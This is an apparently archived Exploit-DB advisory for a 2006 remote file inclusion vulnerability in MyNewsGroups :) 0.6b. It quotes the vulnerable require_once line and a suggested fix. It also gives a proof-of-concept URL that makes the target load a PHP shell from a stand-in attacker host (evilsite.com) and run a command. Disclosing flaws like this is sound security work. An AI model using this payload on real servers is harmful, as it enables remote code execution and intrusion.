MyNewsGroups :) v. 0.6b Remote File Inclusion

vendor:

MyNewsGroups :)

by:

Philipp Niedziela

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: MyNewsGroups :)

Affected Version From: 0.6b

Affected Version To: 0.6b

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2006

MyNewsGroups :) v. 0.6b Remote File Inclusion

The vulnerability exists in the code /lib/tree/layersmenue.inc.php in MyNewsGroups :) v. 0.6b, where the $myng_root variable is not properly sanitized before being used. This allows an attacker to include and execute remote files.

Mitigation:

To mitigate this vulnerability, add the following line to the PHP file: $myng_root = "bla/bla" //Your root path

Source

Exploit-DB raw data:

+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: MyNewsGroups :) v. 0.6b
+ Venedor ...........: http://mynewsgroups.sourceforge.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /lib/tree/layersmenue.inc.php:
+
+ .....
+ <?php
+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at telug dot
it)
+
+ require_once $myng_root."/pear/PEAR.php";
+ .....
+
+--------------------------------------------------------------------
+
+ $myng_root is not properly sanitized before being used.
+ The bug is in the "PHP Layers Menu 2.3.5" Package for MyNewsGroups.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $myng_root ="bla/bla" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/pear/PEAR.php/index.html
+
+
http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/P
EAR.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-07-31]